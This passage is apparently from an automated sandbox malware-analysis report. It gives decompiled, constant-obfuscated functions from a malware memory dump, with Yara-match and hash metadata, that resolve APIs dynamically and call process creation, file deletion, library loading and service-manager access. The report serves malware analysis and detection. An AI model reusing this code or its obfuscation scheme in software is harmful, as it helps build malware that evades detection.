                                              				 *(_t279 + 0x54) =  *(_t279 + 0x54) * 0x53;
                                              				 *(_t279 + 0x54) =  *(_t279 + 0x54) * 0x46;
                                              				 *(_t279 + 0x54) =  *(_t279 + 0x54) ^ 0x24032f8e;
                                              				 *(_t279 + 0x4c) = 0x8c7e;
                                              				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) * 0x17;
                                              				_t171 = _t279 - 0x14; // 0x68cf93e9
                                              				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) << 5;
                                              				 *(_t279 + 0x4c) =  *(_t279 + 0x4c) ^ 0x0193ba3f;
                                              				 *(_t279 + 0x30) = 0x8a4e;
                                              				 *(_t279 + 0x30) =  *(_t279 + 0x30) << 0xc;
                                              				 *(_t279 + 0x30) =  *(_t279 + 0x30) | 0xb22e72a5;
                                              				 *(_t279 + 0x30) =  *(_t279 + 0x30) ^ 0xbaaee90f;
                                              				 *(_t279 + 0x18) = 0x537b;
                                              				 *(_t279 + 0x18) =  *(_t279 + 0x18) >> 0x10;
                                              				 *(_t279 + 0x18) =  *(_t279 + 0x18) ^ 0x00002127;
                                              				E002393A8( *(_t279 + 0x44),  *(_t279 + 0x28),  *(_t279 + 0x24), _t171, 0x1e,  *(_t279 + 0x48));
                                              				_t193 = _t279 - 0x21c; // 0x68cf91e1
                                              				E002393A8( *(_t279 + 0x3c),  *(_t279 + 0x34),  *(_t279 + 0x68), _t193, 0x208,  *(_t279 + 0x1c));
                                              				_t198 = _t279 - 0x424; // 0x68cf8fd9
                                              				E002393A8( *(_t279 + 0xc),  *(_t279 + 0x14),  *(_t279 + 0x10), _t198, 0x208,  *(_t279 + 0x58));
                                              				_t202 = _t279 - 0x21c; // 0x68cf91e1
                                              				E00226636(_t202,  *(_t279 + 0x2c),  *(_t279 + 0x6c),  *(_t279 + 0x60),  *((intOrPtr*)(_t279 + 0x78)));
                                              				_t208 = _t279 - 0x424; // 0x68cf8fd9
                                              				E00226636(_t208,  *(_t279 + 0x40),  *(_t279 + 0x50),  *(_t279 + 0x64),  *((intOrPtr*)(_t279 + 0x7c)));
                                              				 *(_t279 - 0x10) =  *(_t279 + 0x5c);
                                              				_t214 = _t279 - 0x14; // 0x68cf93e9
                                              				_t215 = _t279 - 0x21c; // 0x68cf91e1
                                              				 *((intOrPtr*)(_t279 - 0xc)) = _t215;
                                              				_t217 = _t279 - 0x424; // 0x68cf8fd9
                                              				 *((intOrPtr*)(_t279 - 8)) = _t217;
                                              				 *((short*)(_t279 - 4)) =  *(_t279 + 0x38) |  *(_t279 + 0x20);
                                              				_t253 = E00237BF4(_t214,  *(_t279 + 0x54),  *(_t279 + 0x4c),  *(_t279 + 0x30),  *(_t279 + 0x18)); // executed
                                              				asm("sbb eax, eax");
                                              				return  ~_t253 + 1;
                                              			}










                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FileOperation
                                              • String ID: 6S5q$f''e
                                              • API String ID: 3080627654-2864536462
                                              • Opcode ID: 36b9ea7229c61bbd42b1c058f75f695ac5583f6220406a17043b82f58b666b25
                                              • Instruction ID: fb2ea85c7ee93b52c281820c0c594fe4e753e7464182d281f500c819c2ec6ec2
                                              • Opcode Fuzzy Hash: 36b9ea7229c61bbd42b1c058f75f695ac5583f6220406a17043b82f58b666b25
                                              • Instruction Fuzzy Hash: 8DA1CEB140138D9BEF59CF61C9898CE3BB1BF04358F508119FD2A962A0D3BAD959CF81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 97%
                                              			E0022B41F(signed int __edx) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				intOrPtr _v48;
                                              				intOrPtr _t91;
                                              				signed int* _t93;
                                              				intOrPtr _t95;
                                              				signed int _t103;
                                              				signed int _t104;
                                              
                                              				_v44 = _v44 & 0x00000000;
                                              				_v48 = 0x783c80;
                                              				_v8 = 0x978d;
                                              				_v8 = _v8 >> 8;
                                              				_v8 = _v8 >> 5;
                                              				_v8 = _v8 | 0x918d7e28;
                                              				_v8 = _v8 ^ 0x918d7bef;
                                              				_v28 = 0x8ae6;
                                              				_v28 = _v28 + 0xffff2048;
                                              				_v28 = _v28 ^ 0xfffff0f4;
                                              				_v40 = 0x90b0;
                                              				_v40 = _v40 + 0x186c;
                                              				_v40 = _v40 ^ 0x0000e60c;
                                              				_v12 = 0x4bc7;
                                              				_t103 = __edx;
                                              				_v12 = _v12 * 0x77;
                                              				_v12 = _v12 >> 8;
                                              				_v12 = _v12 << 3;
                                              				_v12 = _v12 ^ 0x000165a0;
                                              				_v36 = 0x87ea;
                                              				_v36 = _v36 | 0x75974cd4;
                                              				_v36 = _v36 ^ 0x75979443;
                                              				_v32 = 0x7f4c;
                                              				_v32 = _v32 ^ 0x8971dc13;
                                              				_v32 = _v32 ^ 0x89718547;
                                              				_v24 = 0xd36b;
                                              				_t104 = 0x3c;
                                              				_v24 = _v24 * 9;
                                              				_v24 = _v24 << 1;
                                              				_v24 = _v24 >> 5;
                                              				_v24 = _v24 ^ 0x000045e9;
                                              				_v20 = 0xf34d;
                                              				_v20 = _v20 + 0x5309;
                                              				_v20 = _v20 << 0xa;
                                              				_v20 = _v20 | 0x23e3e3ea;
                                              				_v20 = _v20 ^ 0x27fbee67;
                                              				_v16 = 0xef72;
                                              				_v16 = _v16 * 0x55;
                                              				_v16 = _v16 << 0x10;
                                              				_v16 = _v16 / _t104;
                                              				_v16 = _v16 ^ 0x0225d37d;
                                              				_push(_v28);
                                              				_t91 = E00221000(_v40, _v12, _v36, _v32, E0023889D(_t93, _v8, _v16));
                                              				_t95 =  *0x23ca28; // 0x4c3138
                                              				 *((intOrPtr*)(_t95 + 0x1c + _t103 * 4)) = _t91;
                                              				return E00232025(_v24, _t90, _v20, _v16);
                                              			}




















                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: 81L$#
                                              • API String ID: 1029625771-3372316978
                                              • Opcode ID: 0ba7a23c5e6577c2b067fdea1e1256a043fff69f59f4017ad9f7b991f614a042
                                              • Instruction ID: bdbd862dbe7305b9903c7a193e31468df8da13e6d19c7ddccde24cd92461f820
                                              • Opcode Fuzzy Hash: 0ba7a23c5e6577c2b067fdea1e1256a043fff69f59f4017ad9f7b991f614a042
                                              • Instruction Fuzzy Hash: 4341ED72C0031AEBDB08CFA5C94A4EEBBB1FB54318F208599D411B62A4D7B90B58CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 84%
                                              			E0022568E(void* __ecx, void* __edx) {
                                              				void* _t188;
                                              				void* _t209;
                                              				void* _t210;
                                              				signed int _t215;
                                              				signed int _t216;
                                              				signed int _t217;
                                              				signed int _t218;
                                              				signed int _t219;
                                              				intOrPtr _t242;
                                              				void* _t245;
                                              				void* _t248;
                                              				void* _t249;
                                              
                                              				_t248 = _t249 - 0x5c;
                                              				_t242 =  *((intOrPtr*)(_t248 + 0x6c));
                                              				_t245 = __edx;
                                              				_push(0);
                                              				_push( *((intOrPtr*)(_t248 + 0x78)));
                                              				_push( *((intOrPtr*)(_t248 + 0x74)));
                                              				_push( *((intOrPtr*)(_t248 + 0x70)));
                                              				_push(_t242);
                                              				_push( *((intOrPtr*)(_t248 + 0x68)));
                                              				_push( *((intOrPtr*)(_t248 + 0x64)));
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E0022602B(_t188);
                                              				 *(_t248 + 0x38) = 0xda0c;
                                              				 *(_t248 + 0x38) =  *(_t248 + 0x38) << 7;
                                              				_t215 = 0x75;
                                              				 *(_t248 + 0x38) =  *(_t248 + 0x38) * 0x59;
                                              				 *(_t248 + 0x38) =  *(_t248 + 0x38) ^ 0x25e734ff;
                                              				 *(_t248 + 0x54) = 0xb39d;
                                              				 *(_t248 + 0x54) =  *(_t248 + 0x54) << 6;
                                              				 *(_t248 + 0x54) =  *(_t248 + 0x54) | 0xca3cae0f;
                                              				 *(_t248 + 0x54) =  *(_t248 + 0x54) * 0xe;
                                              				 *(_t248 + 0x54) =  *(_t248 + 0x54) ^ 0x0f551016;
                                              				 *(_t248 + 0x1c) = 0x5da7;
                                              				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) ^ 0x52b401ed;
                                              				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) / _t215;
                                              				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) ^ 0x00b496a1;
                                              				 *(_t248 + 0x30) = 0xba31;
                                              				_t216 = 0x2c;
                                              				 *(_t248 + 0x30) =  *(_t248 + 0x30) / _t216;
                                              				 *(_t248 + 0x30) =  *(_t248 + 0x30) | 0x346b3718;
                                              				 *(_t248 + 0x30) =  *(_t248 + 0x30) ^ 0x346b13e9;
                                              				 *(_t248 + 0x2c) = 0x6402;
                                              				_t217 = 0x3f;
                                              				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) * 0x14;
                                              				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) >> 2;
                                              				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) ^ 0x0001cbcb;
                                              				 *(_t248 + 0x34) = 0x3e45;
                                              				 *(_t248 + 0x34) =  *(_t248 + 0x34) << 0xb;
                                              				 *(_t248 + 0x34) =  *(_t248 + 0x34) >> 2;
                                              				 *(_t248 + 0x34) =  *(_t248 + 0x34) ^ 0x007ce60c;
                                              				 *(_t248 + 0x3c) = 0xfd38;
                                              				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) + 0xffffe888;
                                              				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) * 0x69;
                                              				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) ^ 0x005e4f03;
                                              				 *(_t248 + 0x40) = 0xcc4c;
                                              				 *(_t248 + 0x40) =  *(_t248 + 0x40) ^ 0x07f5c2dc;
                                              				 *(_t248 + 0x40) =  *(_t248 + 0x40) / _t217;
                                              				 *(_t248 + 0x40) =  *(_t248 + 0x40) ^ 0x00207040;
                                              				 *(_t248 + 0x28) = 0x6724;
                                              				 *(_t248 + 0x28) =  *(_t248 + 0x28) + 0xffffafc3;
                                              				 *(_t248 + 0x28) =  *(_t248 + 0x28) << 1;
                                              				 *(_t248 + 0x28) =  *(_t248 + 0x28) ^ 0x000008e0;
                                              				 *(_t248 + 0x24) = 0x9d87;
                                              				 *(_t248 + 0x24) =  *(_t248 + 0x24) >> 6;
                                              				 *(_t248 + 0x24) =  *(_t248 + 0x24) * 0x24;
                                              				 *(_t248 + 0x24) =  *(_t248 + 0x24) ^ 0x00004341;
                                              				 *(_t248 + 0x58) = 0xb89d;
                                              				 *(_t248 + 0x58) =  *(_t248 + 0x58) >> 0xb;
                                              				 *(_t248 + 0x58) =  *(_t248 + 0x58) + 0x8f1;
                                              				 *(_t248 + 0x58) =  *(_t248 + 0x58) << 8;
                                              				 *(_t248 + 0x58) =  *(_t248 + 0x58) ^ 0x00091f00;
                                              				 *(_t248 + 0x44) = 0x534f;
                                              				 *(_t248 + 0x44) =  *(_t248 + 0x44) + 0x522f;
                                              				 *(_t248 + 0x44) =  *(_t248 + 0x44) ^ 0x4c12b7e9;
                                              				 *(_t248 + 0x44) =  *(_t248 + 0x44) ^ 0x4c125009;
                                              				 *(_t248 + 0x20) = 0x7c36;
                                              				 *(_t248 + 0x20) =  *(_t248 + 0x20) ^ 0x32feb437;
                                              				_t218 = 0x73;
                                              				 *(_t248 + 0x20) =  *(_t248 + 0x20) / _t218;
                                              				 *(_t248 + 0x20) =  *(_t248 + 0x20) ^ 0x0071b2de;
                                              				 *(_t248 + 0x4c) = 0x6d80;
                                              				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) + 0xd21e;
                                              				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) + 0xffff4640;
                                              				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) ^ 0x36936ae7;
                                              				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) ^ 0x3693cc91;
                                              				 *(_t248 + 0x50) = 0x11c0;
                                              				 *(_t248 + 0x50) =  *(_t248 + 0x50) | 0x65d8412a;
                                              				_t219 = 0x49;
                                              				 *(_t248 + 0x50) =  *(_t248 + 0x50) / _t219;
                                              				 *(_t248 + 0x50) =  *(_t248 + 0x50) | 0x06211354;
                                              				 *(_t248 + 0x50) =  *(_t248 + 0x50) ^ 0x076544c6;
                                              				 *(_t248 + 0x18) = 0x8ddc;
                                              				 *(_t248 + 0x18) =  *(_t248 + 0x18) | 0x3e354716;
                                              				 *(_t248 + 0x18) =  *(_t248 + 0x18) ^ 0x3e35d915;
                                              				 *(_t248 + 0x14) = 0xfbdb;
                                              				 *(_t248 + 0x14) =  *(_t248 + 0x14) * 0x44;
                                              				 *(_t248 + 0x14) =  *(_t248 + 0x14) ^ 0x0042d7a4;
                                              				 *(_t248 + 0x48) = 0xd404;
                                              				 *(_t248 + 0x48) =  *(_t248 + 0x48) >> 1;
                                              				 *(_t248 + 0x48) =  *(_t248 + 0x48) + 0x728c;
                                              				 *(_t248 + 0x48) =  *(_t248 + 0x48) + 0xfe7d;
                                              				 *(_t248 + 0x48) =  *(_t248 + 0x48) ^ 0x0001b0de;
                                              				_t220 =  *(_t248 + 0x38);
                                              				E002393A8( *(_t248 + 0x38),  *(_t248 + 0x54),  *(_t248 + 0x1c), _t248 - 0x40, 0x44,  *(_t248 + 0x30));
                                              				 *((intOrPtr*)(_t248 - 0x40)) = 0x44;
                                              				_t209 = E0023976F( *(_t248 + 0x2c), _t248 + 4,  *(_t248 + 0x34),  *(_t248 + 0x3c),  *(_t248 + 0x40),  *(_t248 + 0x28), _t248 - 0x40, _t245,  *(_t248 + 0x24),  *(_t248 + 0x38), _t220,  *(_t248 + 0x58),  *(_t248 + 0x44), _t220,  *(_t248 + 0x20),  *(_t248 + 0x4c),  *((intOrPtr*)(_t248 + 0x64)), _t220,  *((intOrPtr*)(_t248 + 0x74))); // executed
                                              				if(_t209 == 0) {
                                              					_t210 = 0;
                                              				} else {
                                              					if(_t242 == 0) {
                                              						E00234F7D( *(_t248 + 0x50),  *(_t248 + 0x18),  *((intOrPtr*)(_t248 + 4)));
                                              						E00234F7D( *(_t248 + 0x14),  *(_t248 + 0x48),  *((intOrPtr*)(_t248 + 8)));
                                              					} else {
                                              						asm("movsd");
                                              						asm("movsd");
                                              						asm("movsd");
                                              						asm("movsd");
                                              					}
                                              					_t210 = 1;
                                              				}
                                              				return _t210;
                                              			}















                                              0x002258af
                                              0x002258b2
                                              0x002258b9
                                              0x002258c0
                                              0x002258d3
                                              0x002258d6
                                              0x002258de
                                              0x00225915
                                              0x0022591f
                                              0x00225951
                                              0x00225921
                                              0x00225923
                                              0x0022593a
                                              0x00225948
                                              0x00225925
                                              0x00225928
                                              0x00225929
                                              0x0022592a
                                              0x0022592b
                                              0x0022592b
                                              0x0022592e
                                              0x0022592e
                                              0x00225959

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID: @p
                                              • API String ID: 963392458-2609516012
                                              • Opcode ID: d31ca1205623dc1cdc77aa9fcf8a92b76c26a84db24defd749b4b1a88d353f87
                                              • Instruction ID: d2c0ddd81a123bc7759a86a247bffa3c466b8026ac9240e27d5f2f2fc7516497
                                              • Opcode Fuzzy Hash: d31ca1205623dc1cdc77aa9fcf8a92b76c26a84db24defd749b4b1a88d353f87
                                              • Instruction Fuzzy Hash: F69114B2510248EFDF59CFA1C98A8CE3BA1FF44348F509119FE16961A0D3BAD995CF80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 90%
                                              			E0022C0C6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				signed int _v60;
                                              				signed int _v64;
                                              				intOrPtr _v68;
                                              				intOrPtr _v72;
                                              				char _v592;
                                              				void* _t141;
                                              				void* _t159;
                                              				signed int _t161;
                                              				signed int _t162;
                                              				signed int _t163;
                                              				signed int _t164;
                                              
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E0022602B(_t141);
                                              				_v64 = _v64 & 0x00000000;
                                              				_v60 = _v60 & 0x00000000;
                                              				_v72 = 0x2e7eef;
                                              				_v68 = 0x12a0e3;
                                              				_v36 = 0x822d;
                                              				_v36 = _v36 ^ 0x7542ca13;
                                              				_v36 = _v36 >> 8;
                                              				_v36 = _v36 ^ 0x00755fa2;
                                              				_v48 = 0xc0ea;
                                              				_t161 = 0x4d;
                                              				_v48 = _v48 * 0x52;
                                              				_v48 = _v48 + 0x53ba;
                                              				_v48 = _v48 ^ 0x003e0539;
                                              				_v8 = 0xf2be;
                                              				_v8 = _v8 ^ 0xca92c6dd;
                                              				_v8 = _v8 | 0xdeb53509;
                                              				_v8 = _v8 + 0x330e;
                                              				_v8 = _v8 ^ 0xdeb75724;
                                              				_v28 = 0xbc60;
                                              				_v28 = _v28 * 3;
                                              				_v28 = _v28 ^ 0x088be546;
                                              				_v28 = _v28 ^ 0x0889fb38;
                                              				_v20 = 0x79be;
                                              				_v20 = _v20 / _t161;
                                              				_t162 = 0x2f;
                                              				_v20 = _v20 * 0x21;
                                              				_v20 = _v20 / _t162;
                                              				_v20 = _v20 ^ 0x000058f8;
                                              				_v12 = 0x6f12;
                                              				_v12 = _v12 + 0x2ef8;
                                              				_v12 = _v12 ^ 0xc4c69b2c;
                                              				_t163 = 0x19;
                                              				_v12 = _v12 / _t163;
                                              				_v12 = _v12 ^ 0x07dec8f1;
                                              				_v16 = 0x233d;
                                              				_v16 = _v16 >> 0xd;
                                              				_v16 = _v16 ^ 0xb86ca57e;
                                              				_v16 = _v16 ^ 0x25a63868;
                                              				_v16 = _v16 ^ 0x9dca839c;
                                              				_v44 = 0x9c92;
                                              				_v44 = _v44 ^ 0x484225af;
                                              				_v44 = _v44 << 0xa;
                                              				_v44 = _v44 ^ 0x0ae4f7f7;
                                              				_v56 = 0xf3a1;
                                              				_v56 = _v56 + 0xffff3be5;
                                              				_v56 = _v56 ^ 0x00000dea;
                                              				_v24 = 0xe687;
                                              				_v24 = _v24 ^ 0x2fa59812;
                                              				_v24 = _v24 | 0x8a70baf8;
                                              				_v24 = _v24 << 0xe;
                                              				_v24 = _v24 ^ 0x7fbf04b5;
                                              				_v40 = 0x7d0b;
                                              				_v40 = _v40 + 0xffffa14c;
                                              				_v40 = _v40 + 0x5747;
                                              				_v40 = _v40 ^ 0x000069af;
                                              				_v32 = 0xbccf;
                                              				_v32 = _v32 << 0xb;
                                              				_v32 = _v32 + 0xa312;
                                              				_v32 = _v32 ^ 0x05e7304f;
                                              				_v52 = 0xd186;
                                              				_v52 = _v52 << 7;
                                              				_t164 = 0xc;
                                              				_v52 = _v52 / _t164;
                                              				_v52 = _v52 ^ 0x0008a17f;
                                              				_push(_v48);
                                              				E00237BAF(_v52,  &_v592, _v28, _a4, _v20, _v12, E0023889D(0x23c050, _v36, _v52));
                                              				E00232025(_v16, _t154, _v44, _v56);
                                              				_t159 = E0023AA3C(_v24, _v40, _v32, _v52,  &_v592); // executed
                                              				return _t159;
                                              			}




























                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID: ~.
                                              • API String ID: 4033686569-2304494891
                                              • Opcode ID: 55c8e7fc88639b1511d95635a0b0345608d8418da22611c1ac8f21275ee59481
                                              • Instruction ID: 7a0dd3f810938763798439b4eed8cd330beba95872c25e850214a34e891f0498
                                              • Opcode Fuzzy Hash: 55c8e7fc88639b1511d95635a0b0345608d8418da22611c1ac8f21275ee59481
                                              • Instruction Fuzzy Hash: 675113B1C1121DEBDF48DFE5D94A8EEBBB2FB08304F208159E511B6260C7B91A58DF94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00228736(long __ecx) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				void* _t64;
                                              				signed int _t66;
                                              				signed int _t67;
                                              				signed int _t68;
                                              				long _t77;
                                              
                                              				_v16 = 0x5e27;
                                              				_v16 = _v16 >> 0x10;
                                              				_v16 = _v16 + 0xcb06;
                                              				_v16 = _v16 + 0xffffffa0;
                                              				_v16 = _v16 ^ 0x0000caae;
                                              				_v20 = 0x53d5;
                                              				_v20 = _v20 << 0xf;
                                              				_v20 = _v20 ^ 0x29eaafbc;
                                              				_v12 = 0x2701;
                                              				_t77 = __ecx;
                                              				_t66 = 0x3f;
                                              				_v12 = _v12 * 0x75;
                                              				_v12 = _v12 / _t66;
                                              				_v12 = _v12 >> 9;
                                              				_v12 = _v12 ^ 0x0000510c;
                                              				_v24 = 0xb555;
                                              				_v24 = _v24 | 0xad821aca;
                                              				_v24 = _v24 ^ 0xad82f196;
                                              				_v8 = 0x411b;
                                              				_t67 = 0x67;
                                              				_v8 = _v8 / _t67;
                                              				_t68 = 0x1c;
                                              				_v8 = _v8 / _t68;
                                              				_v8 = _v8 >> 8;
                                              				_v8 = _v8 ^ 0x00005eaa;
                                              				_t64 = E0023981E(_t77, E0022C506(_t68), _v16, _v12, _v24, _v8); // executed
                                              				return _t64;
                                              			}














                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 143c34c34cbd3b33341801c7d9cc665edc253c7b9165565ce924f81eb71ba2ac
                                              • Instruction ID: 4f2177031d747ce27b074eddac9c8a45aba2a1173f3e9bff45be6ddb25a6703e
                                              • Opcode Fuzzy Hash: 143c34c34cbd3b33341801c7d9cc665edc253c7b9165565ce924f81eb71ba2ac
                                              • Instruction Fuzzy Hash: 33214271D00209EBEB08DFA9D94A4DEBBB2EB44304F208199E415B7294E7B51B64DF81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 62%
                                              			E00222959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				void* _t30;
                                              				void* _t39;
                                              				signed int _t41;
                                              				signed int _t42;
                                              
                                              				_push(_a16);
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(0);
                                              				_push(0);
                                              				E0022602B(_t30);
                                              				_v12 = 0x5e3c;
                                              				_t41 = 0x63;
                                              				_v12 = _v12 / _t41;
                                              				_t42 = 0x2f;
                                              				_v12 = _v12 / _t42;
                                              				_v12 = _v12 ^ 0x000064be;
                                              				_v8 = 0x74da;
                                              				_v8 = _v8 | 0xfefeeaea;
                                              				_v8 = _v8 >> 0xc;
                                              				_v8 = _v8 ^ 0x000fb531;
                                              				E002307A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                              				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                              				return _t39;
                                              			}










                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002229DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: ManagerOpen
                                              • String ID: <^
                                              • API String ID: 1889721586-3203995635
                                              • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction ID: 37b4d298cd155c94a1be96190f1608c22ec2d5d7dc8241c68084df23160ea007
                                              • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction Fuzzy Hash: E5016D72A00108BFEB14DF95DC4A8DFBFB6EF44310F108088F508A6250D7B69F619B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 58%
                                              			E0022C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                              				signed int _v8;
                                              				unsigned int _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				intOrPtr _v28;
                                              				void* _t29;
                                              				intOrPtr* _t33;
                                              				void* _t34;
                                              
                                              				E0022602B(_t29);
                                              				_v28 = 0x4fe02f;
                                              				_v24 = 0x232390;
                                              				_v20 = 0xf8460;
                                              				_v16 = 0;
                                              				_v12 = 0xf625;
                                              				_v12 = _v12 >> 6;
                                              				_v12 = _v12 >> 0xa;
                                              				_v12 = _v12 + 0xffffcc6f;
                                              				_v12 = _v12 ^ 0xffffa5b6;
                                              				_v8 = 0xe5cd;
                                              				_v8 = _v8 + 0xffffae4d;
                                              				_v8 = _v8 | 0xf8bbefe7;
                                              				_v8 = _v8 ^ 0xf8bbcc9a;
                                              				_t33 = E002307A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                              				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                              				return _t34;
                                              			}













                                              APIs
                                              • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0022C762
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: FolderPath
                                              • String ID: /O
                                              • API String ID: 1514166925-1923427199
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 82%
                                              			E00221000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                              				unsigned int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				void* _t33;
                                              				struct HINSTANCE__* _t40;
                                              				signed int _t42;
                                              
                                              				_push(_a12);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				E0022602B(_t33);
                                              				_v16 = _v16 & 0x00000000;
                                              				_v24 = 0x1b2eda;
                                              				_v20 = 0x33a3b7;
                                              				_v12 = 0x98c;
                                              				_v12 = _v12 + 0xb426;
                                              				_v12 = _v12 + 0x5beb;
                                              				_t42 = 0x63;
                                              				_v12 = _v12 / _t42;
                                              				_v12 = _v12 ^ 0x00000fce;
                                              				_v8 = 0x120e;
                                              				_v8 = _v8 + 0xfffffcb8;
                                              				_v8 = _v8 + 0xffffefaa;
                                              				_v8 = _v8 >> 5;
                                              				_v8 = _v8 ^ 0x07ff9a02;
                                              				E002307A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                              				_t40 = LoadLibraryW(_a12); // executed
                                              				return _t40;
                                              			}












                                              APIs
                                              • LoadLibraryW.KERNEL32(0033A3B7), ref: 00221096
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: [
                                              • API String ID: 1029625771-3431493590
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00224859() {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				void* _t22;
                                              
                                              				_v12 = 0xafe2;
